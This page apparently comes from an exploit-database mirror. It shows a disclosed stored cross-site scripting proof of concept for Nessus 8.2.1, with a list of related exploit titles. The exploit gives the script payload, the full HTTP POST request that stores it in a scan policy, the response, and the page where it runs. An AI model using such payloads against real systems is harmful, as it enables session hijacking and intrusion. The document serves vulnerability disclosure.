Menu

Improved exploit search engine. Try it out

"Nessus 8.2.1 - Cross-Site Scripting"

Author

"Ozer Goker"

Platform

multiple

Release date

2019-02-04

Release Date Title Type Platform Author
2019-07-12 "Xymon 4.3.25 - useradm Command Execution (Metasploit)" remote multiple Metasploit
2019-07-10 "Mozilla Spidermonkey - Unboxed Objects Uninitialized Memory Access" dos multiple "Google Security Research"
2019-07-09 "Firefox 67.0.4 - Denial of Service" dos multiple "Tejas Ajay Naik"
2019-07-03 "Symantec DLP 15.5 MP1 - Cross-Site Scripting" webapps multiple "Chapman Schleiss"
2019-07-01 "CyberPanel 1.8.4 - Cross-Site Request Forgery" webapps multiple "Bilgi Birikim Sistemleri"
2019-07-01 "Sahi pro 8.x - Directory Traversal" webapps multiple "Alexander Bluestein"
2019-07-01 "SAP Crystal Reports - Information Disclosure" webapps multiple "Mohamed M.Fouad"
2019-07-01 "Varient 1.6.1 - SQL Injection" webapps multiple "Mehmet EMIROGLU"
2019-06-26 "Mozilla Spidermonkey - IonMonkey 'Array.prototype.pop' Type Confusion" dos multiple "Google Security Research"
2019-06-24 "GrandNode 4.40 - Path Traversal / Arbitrary File Download" webapps multiple "Corey Robinson"
2019-06-25 "SuperDoctor5 - 'NRPE' Remote Code Execution" remote multiple "Simon Gurney"
2019-06-18 "Sahi pro 8.x - Cross-Site Scripting" webapps multiple "Goutham Madhwaraj"
2019-06-18 "Sahi pro 8.x - SQL Injection" webapps multiple "Goutham Madhwaraj"
2019-06-18 "Sahi pro 7.x/8.x - Directory Traversal" webapps multiple "Goutham Madhwaraj"
2019-06-17 "RedwoodHQ 2.5.5 - Authentication Bypass" webapps multiple EthicalHCOP
2019-06-17 "Thunderbird ESR < 60.7.XXX - 'icalrecur_add_bydayrules' Stack-Based Buffer Overflow" dos multiple "X41 D-Sec GmbH"
2019-06-17 "Thunderbird ESR < 60.7.XXX - 'parser_get_next_char' Heap-Based Buffer Overflow" dos multiple "X41 D-Sec GmbH"
2019-06-17 "Thunderbird ESR < 60.7.XXX - 'icalmemorystrdupanddequote' Heap-Based Buffer Overflow" dos multiple "X41 D-Sec GmbH"
2019-06-17 "Thunderbird ESR < 60.7.XXX - Type Confusion" dos multiple "X41 D-Sec GmbH"
2019-06-05 "Google Chrome 73.0.3683.103 - 'WasmMemoryObject::Grow' Use-After-Free" dos multiple "Google Security Research"
2019-05-28 "Phraseanet < 4.0.7 - Cross-Site Scripting" webapps multiple "Krzysztof Szulski"
2019-05-27 "Deltek Maconomy 2.2.5 - Local File Inclusion" webapps multiple JameelNabbo
2019-05-29 "Spidermonkey - IonMonkey Unexpected ObjectGroup in ObjectGroupDispatch Operation" dos multiple "Google Security Research"
2019-05-29 "Spidermonkey - IonMonkey Leaks JS_OPTIMIZED_OUT Magic Value to Script" dos multiple "Google Security Research"
2019-05-22 "Zoho ManageEngine ServiceDesk Plus 9.3 - Cross-Site Scripting" webapps multiple Vingroup
2019-05-22 "Zoho ManageEngine ServiceDesk Plus < 10.5 - Improper Access Restrictions" webapps multiple Vingroup
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 XNU - 'in6_pcbdetach' Stale Pointer Use-After-Free" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 XNU - Wild-read due to bad cast in stf_ioctl" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - AIR Optimization Incorrectly Removes Assignment to Register" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - Loop-Invariant Code Motion (LICM) in DFG JIT Leaves Stack Variable Uninitialized" dos multiple "Google Security Research"
Release Date Title Type Platform Author
2019-03-25 "Apache CouchDB 2.3.1 - Cross-Site Request Forgery / Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-03-08 "OrientDB 3.0.17 GA Community Edition - Cross-Site Request Forgery / Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-02-18 "Comodo Dome Firewall 2.7.0 - Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-02-18 "ArangoDB Community Edition 3.4.2-1 - Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-02-18 "Apache CouchDB 2.3.0 - Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-02-12 "OPNsense < 19.1.1 - Cross-Site Scripting" webapps php "Ozer Goker"
2019-02-11 "IPFire 2.21 - Cross-Site Scripting" webapps cgi "Ozer Goker"
2019-02-11 "Smoothwall Express 3.1-SP4 - Cross-Site Scripting" webapps cgi "Ozer Goker"
2019-02-04 "pfSense 2.4.4-p1 - Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-02-04 "Nessus 8.2.1 - Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-01-07 "phpMoAdmin MongoDB GUI 1.1.5 - Cross-Site Request Forgery / Cross-Site Scripting" webapps php "Ozer Goker"
2017-01-13 "Zeroshell 3.6.0/3.7.0 Net Services - Remote Code Execution" webapps linux "Ozer Goker"
2016-04-21 "phpLiteAdmin 1.9.6 - Multiple Vulnerabilities" webapps php "Ozer Goker"
2016-04-14 "PHPmongoDB 1.0.0 - Multiple Vulnerabilities" webapps php "Ozer Goker"
2016-04-11 "RockMongo PHP MongoDB Administrator 1.1.8 - Multiple Vulnerabilities" webapps php "Ozer Goker"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46315/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46315/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46315/40786/nessus-821-cross-site-scripting/download/", "exploit_id": "46315", "exploit_description": "\"Nessus 8.2.1 - Cross-Site Scripting\"", "exploit_date": "2019-02-04", "exploit_author": "\"Ozer Goker\"", "exploit_type": "webapps", "exploit_platform": "multiple", "exploit_port": null}
                                            

For full documentation follow the link above

blog comments powered by Disqus

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
##################################################################################################################################
# Exploit Title: Nessus 8.2.1 | Stored Cross-Site Scripting
# Date: 29.01.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://www.tenable.com
# Software Link: https://www.tenable.com/downloads/nessus
# Version: 8.2.1
##################################################################################################################################

Introduction
Nessus is #1 For Vulnerability Assessment

From the beginning, we've worked hand-in-hand with the security community. We continuously optimize Nessus based on community feedback to make it the most accurate and comprehensive vulnerability assessment solution in the market. 20 years later and we're still laser focused on community collaboration and product innovation to provide the most accurate and complete vulnerability data - so you don't miss critical issues which could put your organization at risk.


#################################################################################


XSS details: Stored

#################################################################################

XSS1 | Stored

URL
https://localhost:8834/policies

METHOD
Post

PARAMETER
value

PAYLOAD
\"><script>alert(1)</script>


Request

POST /policies HTTP/1.1
Host: localhost:8834
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost:8834/
Content-Type: application/json
X-API-Token: 9A8BB6D6-2297-47EF-8083-D1EC639444B4
X-Cookie: token=7856d1d4dfdeb394d00a3993b6c3829df42ba6dbebbcac45
Content-Length: 3467
DNT: 1
Connection: close

{"uuid":"939a2145-95e3-0c3f-f1cc-761db860e4eed37b6eee77f9e101","dynamicPluginFilters":{"joinOperator":"and","filters":[{"filter":"cve","quality":"eq","value":"\"><script>alert(1)</script>"}]},"credentials":{"add":{},"edit":{},"delete":[]},"settings":{"patch_audit_over_rexec":"no","patch_audit_over_rsh":"no","patch_audit_over_telnet":"no","additional_snmp_port3":"161","additional_snmp_port2":"161","additional_snmp_port1":"161","snmp_port":"161","http_login_auth_regex_nocase":"no","http_login_auth_regex_on_headers":"no","http_login_invert_auth_regex":"no","http_login_max_redir":"0","http_reauth_delay":"","http_login_method":"POST","enable_admin_shares":"no","start_remote_registry":"no","dont_use_ntlmv1":"yes","never_send_win_creds_in_the_clear":"yes","attempt_least_privilege":"no","ssh_client_banner":"OpenSSH_5.0","ssh_port":"22","ssh_known_hosts":"","region_hkg_pref_name":"yes","region_syd_pref_name":"yes","region_lon_pref_name":"yes","region_iad_pref_name":"yes","region_ord_pref_name":"yes","region_dfw_pref_name":"yes","microsoft_azure_subscriptions_ids":"","aws_use_https":"yes","aws_verify_ssl":"yes","aws_ui_region_type":"Rest of the World","aws_sa_east_1":"","aws_ap_south_1":"","aws_ap_southeast_2":"","aws_ap_southeast_1":"","aws_ap_northeast_3":"","aws_ap_northeast_2":"","aws_ap_northeast_1":"","aws_eu_north_1":"","aws_eu_central_1":"","aws_eu_west_3":"","aws_eu_west_2":"","aws_eu_west_1":"","aws_ca_central_1":"","aws_us_west_2":"","aws_us_west_1":"","aws_us_east_2":"","aws_us_east_1":"","enable_plugin_list":"no","audit_trail":"full","enable_plugin_debugging":"no","log_whole_attack":"no","max_simult_tcp_sessions_per_scan":"","max_simult_tcp_sessions_per_host":"","max_hosts_per_scan":"30","max_checks_per_host":"5","network_receive_timeout":"5","reduce_connections_on_congestion":"no","slice_network_addresses":"no","stop_scan_on_disconnect":"no","safe_checks":"yes","display_unreachable_hosts":"no","log_live_hosts":"no","reverse_lookup":"no","allow_post_scan_editing":"yes","silent_dependencies":"yes","report_superseded_patches":"yes","report_verbosity":"Normal","scan_malware":"no","enum_local_users_end_uid":"1200","enum_local_users_start_uid":"1000","enum_domain_users_end_uid":"1200","enum_domain_users_start_uid":"1000","request_windows_domain_info":"yes","scan_webapps":"no","test_default_oracle_accounts":"no","provided_creds_only":"yes","smtp_to":"postmaster@[AUTO_REPLACED_IP]","smtp_from":"nobody@example.com","smtp_domain":"example.com","av_grace_period":"0","thorough_tests":"no","report_paranoia":"Normal","detect_ssl":"yes","check_crl":"no","enumerate_all_ciphers":"yes","cert_expiry_warning_days":"60","ssl_prob_ports":"Known SSL ports","svc_detection_on_all_ports":"yes","udp_scanner":"no","syn_scanner":"yes","syn_firewall_detection":"Automatic (normal)","verify_open_ports":"no","only_portscan_if_enum_failed":"yes","snmp_scanner":"yes","wmi_netstat_scanner":"yes","ssh_netstat_scanner":"yes","portscan_range":"default","unscanned_closed":"no","wol_wait_time":"5","wol_mac_addresses":"","scan_ot_devices":"no","scan_netware_hosts":"no","scan_network_printers":"no","ping_the_remote_host":"yes","udp_ping":"no","icmp_ping":"yes","icmp_ping_retries":"2","icmp_unreach_means_host_down":"no","tcp_ping":"yes","tcp_ping_dest_ports":"built-in","arp_ping":"yes","fast_network_discovery":"no","test_local_nessus_host":"yes","acls":[{"object_type":"policy","permissions":0,"type":"default"}],"description":"","name":"test"}}

Response

HTTP/1.1 200 OK
Cache-Control:
X-Frame-Options: DENY
Content-Type: application/json
Date: : Tue, 29 Jan 2019 12:44:04 GMT
Connection: close
Server: NessusWWW
X-Content-Type-Options: nosniff
Content-Length: 38
Expires: 0
Pragma:

{"policy_id":161,"policy_name":"test"}


PoC
URL
https://localhost:8834/#/scans/policies/161/config/dynamic-plugins